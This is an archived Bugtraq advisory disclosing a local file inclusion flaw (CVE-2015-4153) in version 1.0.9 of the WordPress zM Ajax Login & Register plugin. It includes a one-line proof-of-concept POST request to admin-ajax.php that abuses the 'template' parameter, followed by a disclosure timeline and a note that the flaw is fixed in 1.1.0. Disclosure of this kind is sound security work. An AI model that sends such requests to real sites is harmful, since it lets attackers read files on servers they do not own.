| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <201506040856.t548ubZt017771@sf01web3.securityfocus.com> Date: Thu, 4 Jun 2015 08:56:37 GMT From: pan.vagenas@...il.com To: bugtraq@...urityfocus.com Subject: CVE-2015-4153 - WordPress zM Ajax Login & Register Plugin [Local File Inclusion] # Exploit Title: CVE-2015-4153 - WordPress zM Ajax Login & Register Plugin [Local File Inclusion] # Date: 2015/06/01 # Exploit Author: Panagiotis Vagenas # Contact: https://twitter.com/panVagenas # Vendor Homepage: http://zanematthew.com/ # Software Link: https://downloads.wordpress.org/plugin/zm-ajax-login-register.1.0.9.zip # Version: 1.0.9 # Tested on: WordPress 4.2.2 # Category: webapps # CVE: CVE-2015-4153 * Description Any authenticated or non-authenticated user can perform a local file inclusion attack by exploiting the wp_ajax_nopriv_load_template action. Plugin simply includes the file specified in 'template' POST parameter without any further validation. * Proof of Concept Send a post request to `http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data: `action=load_template&template=[relative path to local file]&security=[wp nonce]&referer=[action from which the nonce came from]` * Timeline 2015/06/01 Discovered 2015/06/01 Vendor alerted via contact form at his website 2015/06/03 Vendor responded 2015/06/03 Fixed in version 1.1.0 * Solution Update to version 1.1.0
Powered by blists - more mailing lists